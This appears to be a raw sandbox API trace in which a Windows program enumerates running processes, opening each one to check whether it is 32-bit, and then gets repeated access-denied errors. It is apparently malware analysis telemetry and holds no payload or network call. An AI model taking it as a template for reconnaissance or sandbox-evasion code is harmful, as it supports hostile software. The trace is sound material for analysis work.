	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x7721d0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0072.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0072.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.987] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0072.988] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.988] CloseHandle (hObject=0x224) returned 1
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0072.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728858, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0072.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.989] CloseHandle (hObject=0x224) returned 1
	[0072.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0072.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0072.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0072.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.989] CloseHandle (hObject=0x224) returned 1
	[0072.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0072.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.989] CloseHandle (hObject=0x224) returned 1
	[0072.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0072.989] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.989] CloseHandle (hObject=0x224) returned 1
	[0072.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0072.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.990] CloseHandle (hObject=0x224) returned 1
	[0072.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0072.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.990] CloseHandle (hObject=0x224) returned 1
	[0072.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0072.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.990] CloseHandle (hObject=0x224) returned 1
	[0072.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0072.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0072.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.990] CloseHandle (hObject=0x224) returned 1
	[0072.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0072.990] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.991] CloseHandle (hObject=0x224) returned 1
	[0072.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0072.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.991] CloseHandle (hObject=0x224) returned 1
	[0072.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0072.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0072.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.991] CloseHandle (hObject=0x224) returned 1
	[0072.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0072.991] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.991] CloseHandle (hObject=0x224) returned 1
	[0072.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0072.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0072.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.992] CloseHandle (hObject=0x224) returned 1
	[0072.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7287f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0072.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0072.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.992] CloseHandle (hObject=0x224) returned 1
	[0072.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e7c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0072.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0072.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.992] CloseHandle (hObject=0x224) returned 1
	[0072.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0072.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.992] CloseHandle (hObject=0x224) returned 1
	[0072.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0072.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0072.992] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.992] CloseHandle (hObject=0x224) returned 1
	[0072.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0072.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0072.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.993] CloseHandle (hObject=0x224) returned 1
	[0072.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7289b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0072.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0072.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.993] CloseHandle (hObject=0x224) returned 1
	[0072.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0072.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0072.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.993] CloseHandle (hObject=0x224) returned 1
	[0072.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0072.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.993] CloseHandle (hObject=0x224) returned 1
	[0072.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772218, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0072.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0072.993] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.993] CloseHandle (hObject=0x224) returned 1
	[0072.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e720, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0072.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0072.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.994] CloseHandle (hObject=0x224) returned 1
	[0072.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0072.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.994] CloseHandle (hObject=0x224) returned 1
	[0072.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0072.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0072.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.994] CloseHandle (hObject=0x224) returned 1
	[0072.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7289b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0072.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0072.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.994] CloseHandle (hObject=0x224) returned 1
	[0072.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0072.994] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0072.994] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.994] CloseHandle (hObject=0x224) returned 1
	[0072.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0072.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0072.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.995] CloseHandle (hObject=0x224) returned 1
	[0072.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea18, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0072.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0072.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.995] CloseHandle (hObject=0x224) returned 1
	[0072.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea90, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0072.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.995] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0072.995] CloseHandle (hObject=0x224) returned 1
	[0072.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0072.995] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.995] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
	[0072.996] GetLastError () returned 0x5
